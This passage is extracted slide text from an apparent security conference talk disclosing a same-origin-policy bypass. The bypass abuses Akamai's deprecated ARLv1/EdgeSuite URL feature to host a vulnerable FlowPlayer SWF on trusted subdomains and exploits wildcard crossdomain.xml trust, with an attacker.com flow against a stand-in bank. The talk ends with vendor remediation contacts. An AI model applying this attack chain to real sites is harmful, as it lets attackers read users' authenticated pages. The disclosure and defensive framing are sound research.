  • 82. 8282 SOP BYPASS AT SCALE Akamai EdgeSuite akamai.example.com example.com
  • 84. 8484 • Akamai Resource Locator • Special URL use to host files on the Akamai network. • A deprecated service that Akamai used to do when setting up clients for their CDN solution. • Despite being deprecated, many endpoints still have it enabled. SOP BYPASS AT SCALE ARLv1
  • 85. 8585 Say you want to host this file on Akamai: http://example.edgesuite.net/flow/swf/example. swf SOP BYPASS AT SCALE ARLv1
  • 86. 8686 http://akamai.example.com/f/248/322142/1d/example.edge suite.net/flow/swf/example.swf SOP BYPASS AT SCALE ARLv1 CACHE OPTIONS (TIME TO CACHE, CLIENT ID, ETC.) THE URL TO THE FILE WEBSITE POINTING TO AKAMAI
  • 87. 8787 • This process is known as Akamaization of a URL. • Akamai’s network works by pulling the file off your server and hosting it on the CDN. SOP BYPASS AT SCALE ARLv1
  • 88. 8888 • If you point akamai.example.com to Akamai’s EdgeSuite service, we can host arbitrary files on your server. • However, you can only use the site to retrieve files from a specific list of sites. SOP BYPASS AT SCALE ARLv1 & EdgeSuite
  • 89. 8989 SOP BYPASS AT SCALE ARLv1
  • 90. 9090 • We took to enumerating what sites could be proxied. ./subbrute.py edgesuite.net • After some searching we found a site on the whitelist. SOP BYPASS AT SCALE ARLv1 & EdgeSuite
  • 91. 9191 SOP BYPASS AT SCALE ARLv1 & EdgeSuite
  • 93. 9393 • Not only do they host FlowPlayer, they host FlowPlayer 3.2.16, which allows the loading of any arbitrary Flash plugins. • So, putting it together - we can now host an intentionally vulnerable version of FlowPlayer on any site mapped to EdgeSuite, and then hijack it. SOP BYPASS AT SCALE ARLv1 & EdgeSuite
  • 96. 9696 THE FALLOUT Full Exploit Flow User logs in to legitbank.com legitbank.com
  • 97. 9797 THE FALLOUT Full Exploit Flow attacker.com legitbank.com
  • 98. 9898 THE FALLOUT Full Exploit Flow akamai.legitbank.com mediapm.edgesuite.net attacker.com legitbank.com
  • 99. 9999 mediapm.edgesuite.net THE FALLOUT Full Exploit Flow ATTACKER LOADS MALICIOUS PLUGIN INTO FLOWPLAYER attacker.com legitbank.com akamai.legitbank.com
  • 100. 100100 THE FALLOUT Full Exploit Flow HIJACKED FLOWPLAYER REQUESTS PAGE FROM LEGITBANK.COM DUE TO A *.LEGITBANK.COM ENTRY IN CROSSDOMAIN.XML THIS IS ALLOWED. mediapm.edgesuite.net akamai.legitbank.com attacker.com legitbank.com
  • 102. 102102 CROSSING THE ORIGIN BOUNDARY Example Crossdomain.xml File http://legitbank.com/crossdomain.xml <cross-domain-policy> <allow-access-from domain=“*.legitbank.com”> <allow-access-from domain=“*.thirdparty.com”> </cross-domain-policy>
  • 103. 103103 CROSSING THE ORIGIN BOUNDARY Example Crossdomain.xml File http://legitbank.com/crossdomain.xml <cross-domain-policy> <allow-access-from domain=“*.legitbank.com”> <allow-access-from domain=“*.thirdparty.com”> </cross-domain-policy> IF ANY SUBDOMAIN IS MAPPED TO EDGESUITE THE SITE IS COMPROMISED IF ANY SUBDOMAIN IS MAPPED TO EDGESUITE THE SITE IS COMPROMISED
  • 104. 104104 • A site doesn’t even have to use Akamai EdgeSuite to be vulnerable. • They just have to trust them via crossdomain.xml. • Due to Flash’s crossdomain.xml policies being so commonly misconfigured, we can increase our impact to affect many more sites. SOP BYPASS AT SCALE Expanding Attack Surface With Flash
  • 105. THE FALLOUT WHO USES A CDN ANYWAYS?
  • 106. VERIZON WIRELESS MY OTHER NUMBER IS YOUR NUMBER
  • 107. NOSCRIPT A WHITELIST IS MORE A LIST OF POSSIBILITIES
  • 108. 108108 • HTTP Content Security Policy (CSP) will not prevent this type of attack. • Since we are loading their SWF into our own page, the CSP does not apply. • Additionally, we can use vulnerable SWFs hosted on Content Delivery Networks (CDNs) to exploit site’s with CDNs in their CSP whitelists. CROSSING THE ORIGIN BOUNDARY Bypassing HTTP Content Security Policy
  • 109. 109109 • Akamai has been super supportive to us throughout this disclosure process. • In order to address this vulnerability, they have provided us with instructions on remediation if you are vulnerable. HOW DO I FIX THIS? Remediation
  • 110. 110110 • You may already be patched! • If you are an Akamai customer you need to call Akamai’s support line at 1-617-444-4699 or email them at ccare@akamai.com. • Public inquires can be directed to Rob Morton at 1-617-444-3641 or rmorton@akamai.com. HOW DO I FIX THIS? How Do I Remediate?
  • 111. 111111 • If you are a security researcher with a vulnerability in Akamai you can reach them at security@akamai.com. • They have a PGP key available on their website that you can use for more sensitive communications. • Akamai is hiring folks at: https://www.akamai.com/us/en/about/careers/ind ex.jsp. HOW DO I FIX THIS? Future Security Research